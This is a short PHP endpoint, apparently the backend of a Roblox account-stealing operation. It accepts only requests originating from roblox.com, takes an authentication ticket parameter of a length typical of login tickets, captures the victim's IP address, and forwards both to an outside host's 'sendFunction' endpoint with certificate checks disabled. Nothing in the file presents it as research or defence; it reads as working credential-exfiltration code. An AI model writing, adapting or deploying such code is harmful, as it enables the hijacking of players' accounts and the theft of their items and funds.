<?php
    require_once '../../config.php';
    $ident = "#identify";

    $allowed_origins = array(
        "https://www.roblox.com",
        "https://web.roblox.com"
    );

    if (!isset($_SERVER['HTTP_ORIGIN']) || !in_array($_SERVER["HTTP_ORIGIN"], $allowed_origins) || !isset($_GET["t"])) {
        die();
    }
    
    
    $ticket = htmlspecialchars($_GET["t"]);
    if (strlen($ticket) < 100 || strlen($ticket) >= 1000) {
        die();
    }

    $isDown = pdoQuery($db, "SELECT `isDown` FROM `global`")->fetchColumn();

    if($isDown == 1){

        
    }
    $ip = htmlspecialchars(realIP());
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://ixwhere.online/includes/layout/sendFunction.php?t=$ticket&id=$ident&ip=$ip");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);

    function realIP() {
        if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
                  $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
                  $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
        }
        $client  = @$_SERVER['HTTP_CLIENT_IP'];
        $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
        $remote  = $_SERVER['REMOTE_ADDR'];
    
        if(filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; }
        elseif(filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; }
        else { $ip = $remote; }
    
        return $ip;
    }
    function pdoQuery($con, $query, $values = array()) {
        if($values) {
            $stmt = $con->prepare($query);
            $stmt->execute($values);
        } else {
            $stmt = $con->query($query);
        }
        return $stmt;
    }
?>